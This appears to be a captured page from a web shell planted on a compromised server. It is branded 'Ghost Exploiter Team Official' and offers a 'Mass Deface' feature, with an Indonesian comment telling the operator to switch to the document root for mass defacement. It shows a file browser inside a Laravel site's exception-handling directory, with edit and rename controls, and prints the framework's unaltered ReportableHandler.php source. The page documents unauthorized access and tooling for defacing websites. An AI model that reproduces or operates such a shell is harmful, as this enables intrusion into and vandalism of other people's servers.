webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Foundation
/
Exceptions
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Whoops
--
ren
views
--
ren
Handler.php
25.607KB
edt
ren
RegisterErrorViewPaths.php
0.413KB
edt
ren
ReportableHandler.php
1.53KB
edt
ren
<?php namespace Illuminate\Foundation\Exceptions; use Illuminate\Support\Traits\ReflectsClosures; use Throwable; class ReportableHandler { use ReflectsClosures; /** * The underlying callback. * * @var callable */ protected $callback; /** * Indicates if reporting should stop after invoking this handler. * * @var bool */ protected $shouldStop = false; /** * Create a new reportable handler instance. * * @param callable $callback * @return void */ public function __construct(callable $callback) { $this->callback = $callback; } /** * Invoke the handler. * * @param \Throwable $e * @return bool */ public function __invoke(Throwable $e) { $result = call_user_func($this->callback, $e); if ($result === false) { return false; } return ! $this->shouldStop; } /** * Determine if the callback handles the given exception. * * @param \Throwable $e * @return bool */ public function handles(Throwable $e) { foreach ($this->firstClosureParameterTypes($this->callback) as $type) { if (is_a($e, $type)) { return true; } } return false; } /** * Indicate that report handling should stop after invoking this callback. * * @return $this */ public function stop() { $this->shouldStop = true; return $this; } }
<=Back
Liking